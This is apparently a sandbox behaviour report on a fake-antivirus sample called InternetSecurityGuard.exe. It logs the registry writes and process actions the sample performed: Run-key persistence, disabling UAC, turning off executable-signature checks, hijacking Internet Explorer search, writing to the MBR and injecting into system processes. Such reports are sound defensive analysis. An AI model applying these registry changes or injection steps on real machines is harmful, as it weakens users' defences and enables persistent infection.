Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Internet Security Guard = "\"C:\\ProgramData\\950a2\\ISd8b.exe\" /s /d" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\Nod\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IIL = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\ltHI = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\ltTST = "15831" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FAKEAV~1\\INTERN~1.EXE" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\ = "Implements DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft\Internet Explorer C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "InternetSecurityGuard.DocHostUIHandler" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software\Microsoft C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetSecurityGuard.DocHostUIHandler C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Software C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\netsh.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 2528 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
